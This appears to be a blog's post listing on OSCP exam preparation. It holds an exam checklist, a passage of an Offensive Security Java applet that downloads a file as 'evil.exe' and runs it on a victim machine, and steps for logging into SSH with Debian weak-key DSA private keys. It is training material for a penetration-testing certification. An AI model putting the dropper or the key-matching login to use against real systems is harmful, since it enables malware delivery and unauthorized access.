Skip to main content

Posts

Showing posts from January, 2020

Things to Remember for OSCP

  All links for OSCP Windows Enum Linux - Enum Windows Priv Esc Cheatsheet Windows Priv Esc Guif.re CVE-Exploits 1) Start Screen Recording using OBS Screen Recorder 2) Check the Machine IP's - Start Timer (Dont Stay on a Single Machine for too Long) - Cracked a Machine - Restart the Timer 3) Start Buffer overflow on the test machine - Start NmapAutomator on all 4 machines before starting BOF on test 4) Take Screenshots of everything 5) Start with 10 Points Box after BOF(25 Points); If this is taking too long, switch to a new box. Come back to this later. Document Everything. 6) HTTP is Vulnerable Most of the times - start with HTTP - Start nikto, dirb,dirsearch, dirbuster - extensions - robots.txt, config.php, license.txt - Try Default Creds - if the creds doesnt work - try searching for creds for sometime - Try Cewl --> use it for brute forcing - Check

Download a file onto Victim Machine using Java Applet and Sign the Applet

This is the java code to download  import java.applet.*; import java.awt.*; import java.io.*; import java.net.URL; import java.util.*; import java.net.URL; /** * Author: Offensive Security * This Java applet will download a file and execute it. **/ public class Java extends Applet { private Object initialized = null; public Object isInitialized() { return initialized; } public void init() { Process f; try { String tmpdir = System.getProperty("java.io.tmpdir") + File.separator; String expath = tmpdir + "evil.exe"; String download = ""; download = getParameter("1"); if (download.length() > 0) { // URL parameter URL url = new URL(download); // Get an input stream for reading InputStream in = url.openStream(); // Create a buffered inp

Using SSH-DSS authorized keys to login to SSH Server without password

For this method to work, you need to have the authorized key of the victim machine cat authorized_keys ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTs................................ SSH-DSS is disabled on new versions of SSH, so you need to enable it nano /etc/ssh/ssh_config PubkeyAcceptedKeyTypes +ssh-dss git clone https://github.com/g0tmi1k/debian-ssh tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2 cd /dss/1024 Copy first few characters from the authorized keys and we going to search for the key from the list of keys we downloaded earlier grep -lr 'AAAAB3Ndskkdsjhfodsi4m5adsa6d5s8RadSsdsWassd3rhf6gySd2sdS34rW' you can see some file with random characters with .pub file; ex: e2eb2172a62d0d7e40f210g6167f65ca-12345.pub But, what we need is not a public key - we need private key to login :) so, search for it again ls -la | grep e2eb2172a62d0 Now you can see two files one private key and one public key; use e2eb2172a62d0d7e40f210g6167f6